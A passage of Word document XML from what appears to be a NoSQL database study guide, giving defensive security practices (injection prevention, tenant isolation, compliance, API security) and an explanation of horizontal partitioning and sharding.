    <w:p w14:paraId="5B723A9F" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Backup and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly back up the database and test the recovery process to ensure data can be restored in case of data loss or corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FC7D8" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributed Denial of Service (DDoS) Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement DDoS protection mechanisms to prevent attackers from overwhelming your database with excessive requests, which could lead to service disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E27A64" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency and Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Even though some NoSQL databases offer eventual consistency, ensure that critical operations are performed with proper isolation levels to avoid data integrity issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E2EC2"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6. Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4BFEA" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Sanitize and validate all inputs to prevent NoSQL injection attacks, where malicious inputs could alter the database query structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD33C2A" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use parameterized queries and avoid directly embedding user inputs in database queries, which could prevent injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7EE07"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7. Secure Development Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833430F" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code Reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Perform regular code reviews to identify and mitigate security vulnerabilities in the application code that interacts with the NoSQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A058FD" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dependency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly update dependencies and third-party libraries to address security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82B7C4" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use separate environments for development, testing, and production, and ensure that security settings are appropriately configured for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0D14E"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8. Multi-Tenancy Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA5934" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tenant Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If using a multi-tenant architecture, ensure strong isolation between tenants to prevent data leakage. This can be achieved through database-level, schema-level, or document-level isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CFEBF" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access Controls for Tenants</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement fine-grained access controls to ensure that tenants can only access their own data and resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305E3F0"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9. Compliance and Data Privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74066672" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regulatory Compliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure the database complies with relevant data protection regulations, such as GDPR, HIPAA, or CCPA. This may include implementing data masking, encryption, and auditing features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349511B6" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Masking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use data masking techniques to hide sensitive data from unauthorized users while still providing access to non-sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D534FA" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. Securing APIs and Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E4E0F" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Secure APIs that interact with the NoSQL database using authentication mechanisms like OAuth2 and API keys. Implement rate limiting to prevent abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE57D3A" w14:textId="77777777" w:rsidR="006C4B99" w:rsidRPr="00DA2F32" w:rsidRDefault="006C4B99" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microservices Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that microservices communicating with the database follow secure communication practices, such as mutual TLS and signed tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85E614" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149F4B2D" w14:textId="1C667201" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc178383326"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is horizontal partitioning, and how does it help improve scalability in NoSQL databases?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="4367FDB4" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Horizontal partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, is a database design technique where a large dataset is divided across multiple databases or nodes based on a specific criterion, such as a key or range of keys. Each partition, or shard, contains a subset of the total data, allowing the system to distribute the data across multiple servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CBBEF" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Horizontal Partitioning Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742759F" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In horizontal partitioning, the rows of a table or collection are divided into smaller, more manageable chunks, and each chunk is stored in a separate database or node. For example, if you have a user database, you might shard the data based on the userID. Users with userID 1-1000 might be stored on one shard, 1001-2000 on another, and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA73EA3" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Horizontal Partitioning in NoSQL Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1ABFF1" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F425A63"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Horizontal partitioning allows a NoSQL database to scale out by adding more nodes or servers, rather than scaling up by upgrading a single server. Each shard can be hosted on a different server, enabling the system to handle larger datasets and higher throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F928000"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social media application, as the number of users grows, new shards can be added to distribute the load across multiple servers, improving scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2245598B" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enhanced Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988DF4B"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By distributing data across multiple nodes, horizontal partitioning reduces the load on any single server. This can lead to faster query responses, as each server handles a smaller portion of the total data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB2A1E"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 NoSQL database handling millions of transactions per second can achieve faster query processing by distributing the transactions across several shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBB3FD" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F4CAC0"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With horizontal partitioning, if one shard or node fails, only a subset of the data is affected, reducing the impact on the overall system. This improves availability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12F96D"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If a shard containing data for users with userID 1-1000 becomes unavailable, users with userID 1001-2000 remain unaffected.</w:t>
      </w:r>
    </w:p>
